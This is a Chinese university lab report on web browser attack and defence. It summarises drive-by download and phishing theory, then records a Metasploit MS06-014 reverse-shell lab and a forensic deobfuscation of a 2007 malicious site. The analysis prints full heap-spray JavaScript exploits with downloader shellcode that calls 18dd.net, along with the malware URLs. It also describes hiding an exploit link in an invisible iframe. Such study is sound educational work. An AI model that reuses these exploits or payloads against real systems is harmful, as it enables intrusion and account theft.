问题 | 回答 |
---|---|
这个作业属于哪个课程 | https://edu.cnblogs.com/campus/besti/19attackdefense |
这个作业的要求在哪里 | https://edu.cnblogs.com/campus/besti/19attackdefense/homework/10756 |
我在这个课程的目标是 | 学习教材第十二章,了解Web浏览器安全攻防技术的相关知识 |
这个作业在哪个具体方面帮助我实现目标 | 相关知识点和实践 |
1. 实践内容
1.1 Web浏览器的技术发展与安全威胁
1.1.1 Web 浏览器战争与技术发展
- 现代 Web 浏览器的基本结构与机理:现代Web浏览器指的是能够符合“现行标准",并且被联网用户所接受使用的Web浏
览器软件。
1.1.2 Web 浏览的安全问题与威胁
Web 浏览器作为目前互联网时代最为重要的软件产品,也正遭遇看我们在第 10 章中已经介绍过的软件安全困境三要素的问题,即复杂性、可扩展性和连通性,从而使得 Web 浏览器软件与操作系统等大型系统软件一样,面临着严峻的安全问题与挑战。
- Web 浏览安全威胁位置:
- 针对传输网络的网络协议安全威胁
- 针对 Web 浏览端系统平台的安全威胁
- 针对 Web 浏览器软件及插件程序的渗透攻击威胁
- 针对互联网用户的社会工程学攻击威胁
1.2 Web浏览端的渗透攻击威胁——网页木马
1.2.1 网页木马安全机理分析
-
网页木马的定义特性:网页木马从本质特性上是利用了现代 Web 浏览器软件中所支持的客户端脚本执行能力,针对 Web 浏览端软件安全漏洞实施客户端渗透攻击, 从而取得在客户端主机的远程代码执行权限来植入恶意程序。
网页木马是对 Web 浏览端软件进行客户端渗透攻击的一类恶意移动代码,通常以网页脚本语言如 JavaScript、 VBScirpt 实现,或以 Flash、 PDF 等恶意构造的 Web 文件形式存在,通过利用 Web 浏览端软件中存在的安全漏洞,获得客户端计算机的控制权限以植入恶意程序。 -
对网页木马机理的全方位分析与理解:与传统服务器端渗透攻击可以主动地进行网络扫描与攻击不同,网页木马的攻击是被动式的,需要通过一些技术方法来诱使互联网用户来访问网页木马页面。此外在网页木马通过渗透攻击获得客户端计算机的远程代码执行权限之后,为了进行进一步的主机控制和敏感信息窃取, 一般需要植入一些盗号木马等类型的恶意程序。因此实施网页木马攻击不像传统服务器端渗透攻击那么简单,往往涉及较为复杂的多步骤攻击场景,并需要多种类型的恶意代码及网络资源。使得网页木马成为近年来最为复杂和难以应对的网络安全威胁类型的原因如下
- 多样化的客户端渗透攻击位置和技术类型
- 分布式、复杂的微观链接结构
- 灵活多变的混淆与对抗分析能力
-
网页木马的本质核心一浏览器渗透攻击:网页木马的本质核心是利用 Web 浏览端软件安全漏洞的渗透攻击代码。
-
网页挂马机制:在编写完成网页木马渗透攻击代码之后,为了使得能够有终端用户使用他们可能存在安全漏洞的 Web 浏览端软件来访问网页木马,攻击者还需要将网页木马挂接到一些拥有客户访问流量的网站页面上,而这一过程就被称为网页挂马。网页挂马的机制很多,最主要的有如下四类策略。
- 内嵌 HTML 标签:第一类策略使用内嵌 HTML 标签,如 iframe 、frame 等,将网页木马链接嵌入到网站首页或其他页面中。
- 恶意 Script 脚本:第二类也是很常用的网页挂马策略是利用script 脚本标签通过外部引用脚本的方式来包含网贞木马, 例如
<script src="URL to Trojan">
。 - 内嵌对象链接:第三类网页挂马策略利用图片、Flash 等内嵌对象中的特定方法来完成指定页面的加载,如 Flash 中的 LoadMovie() 方法等。
- ARP 欺骗挂马:在以上三类网站挂马策略基础上,攻击者还在使用一种危害度更高的策略——ARP 欺骗挂马。
-
混淆机制:除了引入中间跳转节点进行嵌套链接,并集成多种渗透攻击代码之外,网页木马攻击网络中还往往采用了大量的混淆技术,来对抗反病毒软件的检测,并提高反病毒工程师的分析难度,从而使得网页木马攻击网络更难被检测和摧毁,这些混淆技术也被称为“免杀”。目前在网页木马中使用比较广泛的混淆方法中要有
- 将代码重新排版,去除缩进、空行、换行、注释等,同时将网页木马中的变量名替换为一组合法的随机字符串,使其失去自我描述的能力,从而干扰阅读分析;
- 通过大小写变换、十六进制编码、escape 编码、unicode 编码等方法对网页木马进行编码混淆;
- 通过通用或定制的加密工具对网页木马进行加密得到密文,然后使用脚本语言中包含的解密函数,对密文进行解密,再使用 document.write() 或 eval() 进行动态输出或执行,此类混淆方法例如 XXTEA 网页加密工具;
- 利用字符串运算、数学运算或特殊函数可以混淆代码;
- 修改网页木马文件掩码欺骗反病毒软件,或对网页木马文件结构进行混淆,来伪装正常文件,甚至将网页木马代码拆分至多个文件等;
1.2.2 网页木马的检测与分析技术
-
基于特征码匹配的传统检测方法:在网页木马作为一种新形态的恶意代码产生后, 反病毒软件公司仍延用恶意脚本代码静态分析过程来提取出其中具有样本特异性的特征码,然后在线更新手反病毒客户端软件中,使用传统的基于特征码检测方法来尝试从互联网用户上网浏览过程中检测出网页木马。
-
基于统计与机器学习的静态分析方法:为应对网页木马普遍采用的代码混淆机制, 研究人员采用了多种统计与机器学习方法对混淆及行为特征进行检测,包括某于判断矩阵法的网页恶意脚本检测方法、基于静态启发式规则的检测方法、基于多异常语义特征加权的恶意网页检测方法以及基于分类算法的混淆恶意脚本检测方法等。
-
基于动态行为结果判定的检测分析方法:近年来为应对网页木马,最为有效的一种方式是基于动态行为结果判定的检测分析方法,这种方法利用了网页木马在攻击过程中向互联网用户主机植入并激活恶意程序的行为特性,通过构建包含典型 Web 访问浏览器及应用软件、存有安全漏洞的高交互式客户端蜜罐环境,在蜜罐中访问待检测的网页,根据访问过程中是否触发了新启动进程、文件系统修改等非预期系统状态变化,以判定当前访问页面中是否被挂接了网页木马。
- 基于模拟浏览器环境的动态分析检测方法:以脚本执行引擎(如 SpiderMonkey 开源 JavaScript 引擎)为核心,通过模拟实现 DOM 模型页面解析与渲染、ActiveX 等第三方控件构建出一个虚拟的低交互式客户端蜜罐环境,在该环境中进行网页脚本的动态解释执行,以此还原出网页木马在混淆之前的真实形态,并进一步结合反病毒引擎扫描、异常检测、全漏洞模拟与特征检测等方法对网页木马进行分析和检测。
1.2.3 网页木马防范措施
应对网贝木马最根本的防范措施与应对传统渗透攻击一样,就是提升操作系统与浏览端平台软件的安全性,可以采用操作系统本身提供的在线更新以及第三方软件所提供的常用应用软件更新机制,来确保所使用的计算机始终处于一种相对安全的状态。
1.3 揭开网络钓鱼的黑幕
网络钓鱼(Phishing)是社会工程学在互联网中广泛实施的一种典型攻击方式,通过大量发送声称来自于银行或其他知名机构的欺骗性垃圾邮件,意图引诱收信人给出个人敏感信息(如用户名、口令、账号ID 、PIN 码或信用卡详细信息等)。
1.3.2 网络钓鱼攻击的技术内幕
- 网络钓鱼攻击技术策略:首先钓鱼攻击者需要架设支撑钓角攻击的底层基础设施:为了隐藏自已躲避执法部门的追踪,他们都是通过从互联网上寻找被攻陷服务器来搭建钓鱼攻击网络,他们往往扫描互联网的 IP 地址空间以寻找潜在的存有漏洞的主机,并攻陷那些缺乏有效安全防护的服务器、甚至个人主机:有了服务器资源之后, 他们就开始在上面架设钓鱼网站,包栝假冒各种知名金融机构和在线电子商务网站的前台假冒钓鱼网站,以及后台用于收集、验证和发送用户输入敏感信息的脚本。在构建完毕钓鱼网站之后,钓鱼攻击者极大的挑战是如何欺骗大量的互联网用户访问钓鱼网站,除了技术层面上实施 DNS 中毒攻击或 Pharming 网络流量重定向之外,目前更常见的就是通过各种自动化的礼会工程学手段来构造欺骗性垃圾邮件或者信息,来实施撒网式的钓鱼攻击。
- 在指向假冒网站的链接中使用 IP 地址代替域名
- 注册发音相近或形似的 DNS 域名
- 一个假冒钓鱼网站的电子邮件 HTML 内容中嵌入一些指向真实的目标网站链接
- 对假冒网站的 URL 进行编码和混淆
- 企图攻击用户网页浏览器存在的漏洞,使之隐藏消息内容的实质
- 将假冒的钓鱼网站配置成记录用户提交的所有数据并进行不可察觉的日志,然后将用户重定向到真实的网站。
- 架设一个假冒网站, 作为目标机构真实网站的代理
- 通过恶意代码在受害者计算机上安装一个恶意的浏览器助手工具(Browser Helper Object),然后由其将受害者重定向到假冒的钓鱼网站
- 使用恶意代码去修改受害者计算机上的用来维护 DNS 域名和 IP 地址映射的本地
hosts 文件
1.3.3 网络钓鱼攻击的防范
- 针对网络钓鱼过程中的电子邮件和即时通信信息欺诈,应该提高警惕性;
- 充分利用浏览器软件、网络安全厂商软件所提供的反钓鱼网站功能特性;
- 在登录网上银行、证券基金等关键网站进行在线金融操作时,务必要重视防问网站的真实性,不要点击邮件中的链接来访问这些网站,最好以直接访问域名方式来访问,尽量使用硬件 U 盾来代替软证书或口令访问重要的金融网站;
- 最为重要的是,通过学习和修炼提升自己抵抗社会工程学攻击的能力。
2. 实践过程
2.1 动手实践——Web 浏览器渗透攻击实验
任务: 使用攻击机和 Windows 靶机进行浏览器渗透攻击实验,体验网页木马构造及实施浏览器攻击的实际过程。
所需环境:
- 攻击机: BT4 Linux攻击机或 Metasploit 渗透攻击框架软件;
- 靶机:未打补丁的 Windows 靶机,可使用 Windows 2KS 靶机或 Windows XP 靶机。
实验步骤: - 选择使用 Metasploit 中的 MS06-014 渗透攻击模块 (ie_createobject) ;
- 选择 PAYLOAD 为任意远程 Shell 连接;
- 设置服务器地址(SVRHOST或LHOST)和 URL 参数,运行exploit,构造出恶意
网页木马脚本: - 在靶机环境中启动浏览器,验证与服务器的连通性,并访问恶意网页木马脚木 URL;
- 在攻击机的 Metasploit 软件中查看渗透攻击状态,并通过成功渗透攻击后建立起的远桯控制会话 SESSION, 在靶机上远程执行命令。
本次实验所使用的攻击机为 kail linux,靶机为 Windows 2KS,ip 地址如下表所示
主机名称 | ip地址 |
---|---|
kail | 192.168.200.10 |
windows 2ks | 192.168.200.124 |
这里利用的是 MS06-014 漏洞,该漏洞为 Windows 的 RDS.Dataspace ActiveX 实现上存在漏洞,远程攻击者可能利用此漏洞在获取主机的控制。在某些情况下,MDAC 所捆绑的 RDS.Dataspace ActiveX 控件无法确保能够进行安全的交互,导致远程代码执行漏洞,成功利用这个漏洞的攻击者可以完全控制受影响的系统。
首先打开 msfconsole ,搜索这个漏洞
选择漏洞,搜索可用载荷
选择第50号载荷 windows/meterpreter/reverse_tcp,设置载荷,使用show options
查看所需要配置的项
设置服务器地址LHOST
为攻击机地址192.168.200.10,expilot
运行
可以看到恶意木马脚本构造成功,并且生成了一个 URL http://192.168.200.10:8080/WSR0TBBr
接下来打开靶机,在靶机上 ping 服务器,发现可以 ping 通,说明与服务器连通性正常
然后打开浏览器,访问http://192.168.200.10:8080/WSR0TBBr
回到攻击机,可以看到攻击机与靶机建立了一个 session 对话
这代表我们在靶机上成功的获得了 Meterpreter 的 Shell
然后使用命令sessions -l
查看我们控制的主机
使用命令sessions -i 1
选择控制我们攻陷的靶机,并通过ipconfig
命令查看靶机的ip地址
可以看到与在靶机上查看到ip地址的一致
至此实验完成
2.2 取证分析实践: 剖析一个实际的网页木马攻击场景
案例分析挑战内容: 2007 年 10 月,北京大学计算机科学技术研究所信息安全工程研究中心蜜网课题组的成员在进行分析中国万维网挂乃网站的采样分析时, 发现了 个域名为 I8dd.net 的庞大的木马宿主站点。 在链接分析的过程中, 发现有大量恶意网页最终都重定向到了这个站点上,这在全部的宿主站点中排名第一。 进一步的研究分析表明, 这个站点的恶意代码入口是 http://aa.l8dd.net/ww/new09.htm
文件。 现在你的任务是根据给出的说明逐步分析, 得到最终的木马文件的内容。
这个挂马网站现在已经无法访问了, 但蜜网课题组的成员保留了最初做分析时所们的原始文件。首先你应该访问 start.html,在这个文件中给出了 new09.htm 的地址, 在进入 new09.htm 后, 每解密出一个文件地址, 请对其作 32 位 MD5 散列,以散列值为文件名到http://netsec.ccet1.ed.enu/hacking/
目录(或者附偌资料中的解压缩数据目录)下去下载对应的文件(注意: 文件名中的英文字母为小写, 且没有扩展名),即为解密出的地址对应的文件。如果解密出的地址给出的是网页或脚本文件,请继续解密;如果解密出的地址是二进制程序文件,请进行静态反汇编或动态调试。重复以上过程直到这些文件被全部分析完成。请注意:被散列的文件地址应该是标准的 URL 形式, 形如http://xxl8dd.net/a/b.htm
,否则会导致散列值计算不正确而无法继续。
问题:
- 试述你是如何一步步地从所给的网页中获取最后的真实代码的?
- 网页和 JavaScript 代码中都使用了什么样的加密方法?你是如何解密的?
- 从解密后的结果来看,攻击者构造的网页木马利用了哪些安全漏洞?
- 解密后发现了多少个可执行文件?这些可执行文件中有下载器么?如果有,它们下载了哪些程序?这些程序又是起什么作用的?(请举例分析)
分析过程
由于题目中所给的 URL http://192.168.68.253/scom/start.html
无法打开也无法下载(所给资料中也没有),那么就无法找到 new09.htm 文件,当然也无法进行下一步分析,不得已只好按照指导书进行下面的内容
打开 new09.htm 我们可以得到两个链接http://aa.18dd.net/aa/kl.htm
http://js.users.51.la/1299644.js
,分别计算它们的MD5值
分别为7f60672dcd6b5e90b6772545ee219bd3
和23180a42a2ff1192150231b44ffdf3d3
,从老师所给资料中的hashed
文件夹中找到这两个文件
可以发现第一个文件有11kb,第二个文件不到1kb,先看第二个文件
这显然不是我们所需要的内容,那么打开第一个文件
由倒数第三行t=utf8to16(xxtea_decrypt(base64decode(t), 'x73x63x72x69x70x74'));
我们知道这个文件使用了一种
被称为 XXTEA+Base64 的加密方法,对付这种加密方法,我们只要找到它的加密密钥即可。当然这个xxtea_decrypt
函数的第二个参数就是密钥,不过也是被加密过的,但是仅仅是一种16进制加密。转换一下即可得到密钥
可以看到密钥为script
指导书中所给的 xxtea 在线解密网站已经不能用了,这里可以用xxtea在线解密网站来解密,输入密文和密钥,点击解密,即可得到结果
这里加密者又用到了另一种加密方式,也就是十六进制加密,对引号内的内容解密,得到如下结果,将结果保存
分析这段代码,可以看到它利用了应用程序漏洞有“Adodb.Stream”、“MPS.StormPlayer”、“POWERPLAYER.PowerPlayerCtrl.1”和“BaiduBar.Tool”,分别对应利用了微软数据库访问对象、暴风影音、PPStream 和百度搜霸的漏洞。
另外,这个文件还引用三个 js 文件和一个压缩包(bd.cab,解开后是bd.exe)
根据分析结果,对http://aa.18dd.net/aa/1.js
、http://aa.18dd.net/aa/b.js
、http://aa.18dd.net/aa/pps.js
和http://down.18dd.net/bb/bd.cab
作处理
同样计算md5的值,过程同上,可以分别得到它们的MD5值
链接 | MD5值 |
---|---|
http://aa.18dd.net/aa/1.js |
5d7e9058a857aa2abee820d5473c5fa4 |
http://aa.18dd.net/aa/b.js |
3870c28cc279d457746b3796a262f166 |
http://aa.18dd.net/aa/pps.js |
5f0b8bf0385314dbe0e5ec95e6abedc2 |
http://down.18dd.net/bb/bd.cab |
1c1d7b3539a617517c49eee4120783b2 |
同理,到hashed
文件夹中找到这四个文件,保存
首先来看1.js
也就是 5d7e9058a857aa2abee820d5473c5fa4
还是一个十六进制加密,解开可得
这个文件前面部分下载了一个http://down.18dd.net/bb/014.exe
的可执行文件,后面部分则是对ADODB漏洞
的继续利用。
先将这个exe文件放到一边,我们先来看b.js,也就是3870c28cc279d457746b3796a262f166
文件
这段代码看起来让人相当头痛,不过好在第一行的函数的参数(p,a,c,k,e,d)给了我们提示,连起来是“packed”。上网搜索,这其实是一个混淆工具。下面我们在这个网站在线js美化来还原代码
还原后的代码如下所示
var bigblock = unescape("%u9090%u9090");
var headersize = 20;
var shellcode = unescape("%uf3e9%u0000" + "%u9000%u9090%u5a90%ua164%u0030%u0000%u408b%u8b0c" + "%u1c70%u8bad%u0840%ud88b%u738b%u8b3c%u1e74%u0378" + "%u8bf3%u207e%ufb03%u4e8b%u3314%u56ed%u5157%u3f8b" + "%ufb03%uf28b%u0e6a%uf359%u74a6%u5908%u835f%ufcef" + "%ue245%u59e9%u5e5f%ucd8b%u468b%u0324%ud1c3%u03e1" + "%u33c1%u66c9%u088b%u468b%u031c%uc1c3%u02e1%uc103" + "%u008b%uc303%ufa8b%uf78b%uc683%u8b0e%u6ad0%u5904" + "%u6ae8%u0000%u8300%u0dc6%u5652%u57ff%u5afc%ud88b" + "%u016a%ue859%u0057%u0000%uc683%u5613%u8046%u803e" + "%ufa75%u3680%u5e80%uec83%u8b40%uc7dc%u6303%u646d" + "%u4320%u4343%u6643%u03c7%u632f%u4343%u03c6%u4320" + "%u206a%uff53%uec57%u04c7%u5c03%u2e61%uc765%u0344" + "%u7804%u0065%u3300%u50c0%u5350%u5056%u57ff%u8bfc" + "%u6adc%u5300%u57ff%u68f0%u2451%u0040%uff58%u33d0" + "%uacc0%uc085%uf975%u5251%u5356%ud2ff%u595a%ue2ab" + "%u33ee%uc3c0%u0ce8%uffff%u47ff%u7465%u7250%u636f" + "%u6441%u7264%u7365%u0073%u6547%u5374%u7379%u6574" + "%u446d%u7269%u6365%u6f74%u7972%u0041%u6957%u456e" + "%u6578%u0063%u7845%u7469%u6854%u6572%u6461%u4c00" + "%u616f%u4c64%u6269%u6172%u7972%u0041%u7275%u6d6c" + "%u6e6f%u5500%u4c52%u6f44%u6e77%u6f6c%u6461%u6f54" + "%u6946%u656c%u0041%u7468%u7074%u2f3a%u642f%u776f%u2e6e%u3831%u6464%u6e2e%u7465%u622f%u2f62%u6662%u652e%u6578%u0000");
var slackspace = headersize + shellcode.length;
while (bigblock.length < slackspace) bigblock += bigblock;
fillblock = bigblock.substring(0, slackspace);
block = bigblock.substring(0, bigblock.length - slackspace);
while (block.length + slackspace < 0x40000) block = block + block + fillblock;
memory = new Array();
for (x = 0; x < 300; x++) memory[x] = block + shellcode;
var buffer = '';
while (buffer.length < 4068) buffer += "x0ax0ax0ax0a";
storm.rawParse(buffer)
这里出现了关键字 shellcode ,是二进制的机器码,下面分析这个 shellcode
这个 shellcode 并不长,但它要实现很多破坏,不可能把所有的病毒都写在里面。因此它很可能就是下载器。对于一个下载器来说,必不可少的一项内容就是要下载的内容的 URL,我们可以找一找这加密的代码里有 URL 特征的字符串。
URL 中必然会出现的斜线/
,/
的十六进制 ASCII 码是2F
,那么我们就在这段shellcode 中找/
。查找结果如下(高亮处)
这里可以看到后四个2f
比较密集,很可疑。那么我们取第三个2f
到末尾的内容
(这里指导书上给的解密工具同样不能用了,可以采用 FreShow 和16进制转换结合解密)
可以得到一个不完全的网址://down.18dd.net/bb/bf.exe
,将它补充完整http://down.18dd.net/bb/bf.exe
又是一个可执行文件,先放一放。看下一个 js 文件 pps.js ,也就是5f0b8bf0385314dbe0e5ec95e6abedc2
文件,打开查看
这次变成了八进制转换,解密,结果如下
/*%u66c9%u088b%u468b%u031c%uc1c3%u02e1%uc103" +
"%u008b%uc303%ufa8b%uf78b%uc683%u8b0e%u6ad0%u5904" +
"%u6ae8%u0000%u8300%u0dc6%u5652%u57ff%u5afc%ud88b" +
"%u016a%ue859%u0057%u0000%uc683%u5613%u8046%u803e" +
"%ufa75%u3680%u5e80%uec83%u8b40%uc7dc%u6303%u646d" +
"%u4320%u4343%u6643%u03c7%u632f%u4343%u03c6%u4320" +
"%u206a%uff53%uec57%u*/
pps=(document.createElement("object"));
pps.setAttribute("classid","clsid:5EC7C511-CD0F-42E6-830C-1BD9882F3458")
var shellcode = unescape("%uf3e9%u0000"+
"%u9000%u9090%u5a90%ua164%u0030%u0000%u408b%u8b0c" +
"%u1c70%u8bad%u0840%ud88b%u738b%u8b3c%u1e74%u0378" +
"%u8bf3%u207e%ufb03%u4e8b%u3314%u56ed%u5157%u3f8b" +
"%ufb03%uf28b%u0e6a%uf359%u74a6%u5908%u835f%u04c7" +
"%ue245%u59e9%u5e5f%ucd8b%u468b%u0324%ud1c3%u03e1" +
"%u33c1%u66c9%u088b%u468b%u031c%uc1c3%u02e1%uc103" +
"%u008b%uc303%ufa8b%uf78b%uc683%u8b0e%u6ad0%u5904" +
"%u6ae8%u0000%u8300%u0dc6%u5652%u57ff%u5afc%ud88b" +
"%u016a%ue859%u0057%u0000%uc683%u5613%u8046%u803e" +
"%ufa75%u3680%u5e80%uec83%u8b40%uc7dc%u6303%u646d" +
"%u4320%u4343%u6643%u03c7%u632f%u4343%u03c6%u4320" +
"%u206a%uff53%uec57%u04c7%u5c03%u2e61%uc765%u0344" +
"%u7804%u0065%u3300%u50c0%u5350%u5056%u57ff%u8bfc" +
"%u6adc%u5300%u57ff%u68f0%u2451%u0040%uff58%u33d0" +
"%uacc0%uc085%uf975%u5251%u5356%ud2ff%u595a%ue2ab" +
"%u33ee%uc3c0%u0ce8%uffff%u47ff%u7465%u7250%u636f" +
"%u6441%u7264%u7365%u0073%u6547%u5374%u7379%u6574" +
"%u446d%u7269%u6365%u6f74%u7972%u0041%u6957%u456e" +
"%u6578%u0063%u7845%u7469%u6854%u6572%u6461%u4c00" +
"%u616f%u4c64%u6269%u6172%u7972%u0041%u7275%u6d6c" +
"%u6e6f%u5500%u4c52%u6f44%u6e77%u6f6c%u6461%u6f54" +
"%u6946%u656c%u0041%u7468%u7074%u2f3a%u642f%u776f%u2e6e%u3831%u6464%u6e2e%u7465%u622f%u2f62%u7070%u2e73%u7865%u0065");
var bigblock = unescape("%u9090%u9090");
var headersize = 20;
var slackspace = headersize+shellcode.length;
while (bigblock.length<slackspace) bigblock+=bigblock;
fillblock = bigblock.substring(0, slackspace);
block = bigblock.substring(0, bigblock.length-slackspace);
while(block.length+slackspace<0x40000) block = block+block+fillblock;
memory = new Array();
for (x=0; x<400; x++) memory[x] = block + shellcode;
var buffer = '';
while (buffer.length < 500) buffer+="x0ax0ax0ax0a";
pps.Logo = buffer
同样是 shellcode ,与上述过程同理,可以解密出如下 URL http://down.18dd.net/bb/pps.exe
最后一个压缩文件将其解压缩,可以得到bd.exe
执行文件,计算将前三个可执行文件的 URL 的 MD5 值,如下表所示
链接 | MD5值 |
---|---|
http://down.18dd.net/bb/014.exe |
ca4e4a1730b0f69a9b94393d9443b979 |
http://down.18dd.net/bb/bf.exe |
268cbd59fbed235f6cf6b41b92b03f8e |
http://down.18dd.net/bb/pps.exe |
ff59b3b8961f502289c1b4df8c37e2a4 |
于是我们有了四个可执行文件,即 014.exe,bf.exe,pps.exe,bd.exe,将其保存会发现,这四个文件的大小是相同的
校验这四个文件的 MD5 值,会发现居然是相同的(1290ecd734d68d52318ea9016dc6fe63)
结合上述分析,说明这四个可执行文件是相同的,那么分析其中一个就可以了,下面就是我们前面实验所做过的分析一个病毒程序了,那么按照流程,我们先来检验它是否加壳,这里使用 peid 工具
可以看到这个程序是由 Delphi 写得,同时可以使用 DeDe 来验证一下
果不其然是这样,接下来使用反汇编工具 W32DAsm 反汇编这个程序,首先来看一下字符串(这里没有办法放大,只好把它复制出来)
" goto try"
"#32770"
"(T@"
",T@"
".1"
":AutoRun.inf"
":try"
"[AutoRun]
open="
"program filesinternet explorerIEXPLORE.EXE"
"0813"
"3烂怱VQ嬝媠咑u3离&j"
"60000"
"advapi32.dll"
"Alletdel.bat"
"AutoRun.inf"
"Button"
"ChangeServiceConfig2A"
"ChangeServiceConfig2W"
"cmd /c date "
"cmd /c date 1981-01-12"
"del ""
"del %0"
"drivers/klif.sys"
"Error"
"FPUMaskValue"
"http://down.18dd.net/kl/0.exe"
"http://down.18dd.net/kl/1.exe"
"http://down.18dd.net/kl/10.exe"
"http://down.18dd.net/kl/11.exe"
"http://down.18dd.net/kl/12.exe"
"http://down.18dd.net/kl/13.exe"
"http://down.18dd.net/kl/14.exe"
"http://down.18dd.net/kl/15.exe"
"http://down.18dd.net/kl/16.exe"
"http://down.18dd.net/kl/17.exe"
"http://down.18dd.net/kl/18.exe"
"http://down.18dd.net/kl/19.exe"
"http://down.18dd.net/kl/2.exe"
"http://down.18dd.net/kl/3.exe"
"http://down.18dd.net/kl/4.exe"
"http://down.18dd.net/kl/5.exe"
"http://down.18dd.net/kl/6.exe"
"http://down.18dd.net/kl/7.exe"
"http://down.18dd.net/kl/8.exe"
"http://down.18dd.net/kl/9.exe"
"IE 执行保护"
"IEXPLORE.EXE"
"IE执行保护"
"if exist ""
"Kernel32.dll"
"NoDriveTypeAutoRun"
"ntdll.dll"
"QueryServiceConfig2A"
"QueryServiceConfig2W"
"S@"
"serdst.exe"
"shellAutocommand="
"shellexecute="
"SOFTWAREBorlandDelphiRTL"
"SoftwareMicrosoftWindowsCurrentVersionPoli"
"Telephotsgoogle"
"U嬱兡餝VW3繳h訹@"
"U嬱筧"
"U嬱伳�SVW?�"
"ZwUnmapViewOfSection"
"刌@"
"銼@"
"婦$鰼"
"媩$(?"
"燬@"
"擮@"
"确定"
"媆$?搡?婼婥t?燖"
"瑞星卡卡上网安全助手 - IE防漏墙"
"为即插即用设备提供支持"
"圷@"
"允许"
"允许执行"
分析这些字符串:
- 由字符串" goto try",":try","Alletdel.bat","cmd /c date ","cmd /c date 1981-01-12","del "","del %0","if exist ",猜测这个程序可能生成一个叫"Alletdel.bat"的批处理文件,这个文件中有一个标签叫"try",批处理文件会不断的执行这个标签下一行的命令,命令内容可能是判断文件存在性,更改系统日期,删除某些文件
- 由":AutoRun.inf","[AutoRun] open=","AutoRun.inf","shellAutocommand=",猜测这个程序可能在磁盘根目录下生成自动运行的文件,以使得用户在不小心时启动程序
- 由"advapi32.dll","drivers/klif.sys","program filesinternet explorerIEXPLORE.EXE","IE 执行保护","IEXPLORE.EXE","SoftwareMicrosoftWindowsCurrentVersionPoli","Kernel32.dll","SOFTWAREBorlandDelphiRTL","ChangeServiceConfig2A","ChangeServiceConfig2W","QueryServiceConfig2A","QueryServiceConfig2W"等可以猜测程序可能会
修改IE、注册表、服务和系统文件 - 由"瑞星卡卡上网安全助手 - IE防漏墙","允许","允许执行",可知这个程序有一定的防系统保护软件的能力,
- 由20个可执行文件的 URL 猜测程序要下载一大堆木马
- 由“为即插即用设备提供支持”可知要建立服务
下面动态分析这个程序,使用的监视工具为 Process Monitor、SysInspector、Total Uninstall
首先使用 SysInspector 生成运行程序前的系统日志,运行 bd.exe 之后,再次生成一个系统日志,然后点比较日志,可以得到如下结果
可以看到有两处变化
- 在系统文件夹(system32)下创建了一个 serdst.exe 的文件。经MD5检查,该文件就是这个可执行文件。
- 安装了一个服务。服务名为“Wdswsdewn”,显示名为"Telephotsgoogle"
不过在服务建立后并没有什么事情发生......,个人猜测是下载器(bd.exe)中的 URL 已经失效了,不过好在资料中给出了这 20 个执行文件,我们可以直接在这里分析
以4.exe为例,同样重复上述步骤,首先使用 W32Dasm 反汇编,查看字符串,得到如下结果
""
"" goto Loop
del %0
"
"" -r -a -s -h
del ""
""
if exist ""
"%d"
".bat"
".mod"
":Loop
"
"@echo off
"
""
"InprocServer32"
"^B*"
"{28907901-1416-3389"
"1"
"-9981-372178569982}"
"a"
"Apartment"
"asktao"
"attrib ""
"C:DFD"
"CLSID"
"EnHookWindow"
"enweafx.fon"
"Fonts"
"id.exe"
"kawdacs.dll"
"kawdazy.d"
"kawdbaz.exe"
"kawdbzy.dll"
"ll"
"MP3"
"Music"
"q@ı"
"Send"
"SoftwareMicrosoftWindowsCurrentVersionexpl"
"S鐻?吚t嬝覽?
"ThreadingModel"
"Url%d"
"Url1"
"U嬱S瑙?嬝杓铔?+?? "
"vercls"
"wddpri.d"
"獲ı"
"嬂%Q@"
从上面很难推出很多信息,主要可以看到这个病毒可能要生成一个批处理文件并进行删除文件操作,因为"goto Loop del %0"," -r -a -s –h del ","if exist ", ":Loop","@echo off","attrib ""这些内容都是批处理文件中的字符串。同时其中还有ClassID 标识、注册表键值和一些文件名。
接下来使用 SysInspector 进行动态分析,先生成程序运行前的日志,程序运行后再生成一份日志,将其比较,查看结果
生成了一些文件,包括kawdbaz.exe,kawdbzy.dll等,同时删除了verclsid.exe
更改了一些注册表项目,主要是设置了一个钩子,加载了一个启动DLL,另外把Windows的自动更新功能给禁用了。
可以看到这个程序给 explorer.exe 程序和中被注入了动态链接库 kawdbzy.dll。而实际上,除了病毒的主程序文件 kawdbaz.exe 的进程外,Process Monitor、vmtool、SysInspector自己的进程中都被注入了该DLL。
当然凭借这些分析我们还是很难得出这些软件是干什么的,不过可以借用 360 软件来分析一下,这个程序是一个盗号木马
其它19个程序分析过程同理,运行结果基本上大同小异,可以确定这20个程序均是盗号木马
问题解答
试述你是如何一步步地从所给的网页中获取最后的真实代码的?
见上述分析过程
网页和 JavaScript 代码中都使用了什么样的加密方法?你是如何解密的?
使用了8进制,16进制,js 混淆,xxtea + base64加密,二进制机器码加密等。解密过程见上述分析过程
从解密后的结果来看,攻击者构造的网页木马利用了哪些安全漏洞?
- MS06-014网马
- 攻击MS06-014安全漏洞
- MDAC RDS.Dataspace ActiveX控件远程代码执行漏洞
- 暴风影音网马
- 攻击CVE-2007-4816安全漏洞
- 暴风影音2 mps.dll组件多个缓冲区溢出漏洞
- PPStream网马
- 攻击CVE-2007-4748安全漏洞
- PPStream 堆栈溢出
- 百度搜霸网马
- 攻击CVE-2007-4105安全漏洞
- 百度搜霸ActiveX控件远程代码执行漏洞
解密后发现了多少个可执行文件?这些可执行文件中有下载器么?如果有,它们下载了哪些程序?这些程序又是起什么作用的?(请举例分析)
解密后发现了4个可执行文件,这四个可执行文件内容相同,都是下载器,下载了20个程序。这些程序的作用是盗取用户的账号。
2.3 攻防对抗实践: Web 浏览器渗透攻击攻防对抗
攻击方使用 Metasploit 构造出攻击至少两个不同 Web 浏览端软件安全漏洞的渗透攻击代码,并进行混淆处理组装成一个URL链接,通过具有欺骗性的电子邮件发送给防守方。
防守方对电子邮件中的挂马链接进行提取、解混淆分析,尝试恢复出渗透攻击代码的原始形态, 并分析出这些渗透代码都是攻击哪些 Web 浏览端软件的哪些安全漏洞。
双方撰写详细实验分析报告, 对攻防对抗过程进行总结。
这个实验所使用攻击机为 kail,靶机为 win 2kS
攻击方
构建漏洞的过程如第一个实践所示,这里不赘述了。
这里编写一个测试网页 test.html(比较简单),使用iframe
标签将漏洞链接嵌入到我们的测试网页中,这样当用户访问测试网页时候,会一并显示这个页面。同时将高度和宽度设置为0,这样用户就看不见我们嵌入的这个页面
将 test.html 放入 /var/www/html/ 中,同时打开 apache 服务
保存,当用户访问 http://192.168.200.10/test.html
时,就会建立起会话
攻击成功
防守方
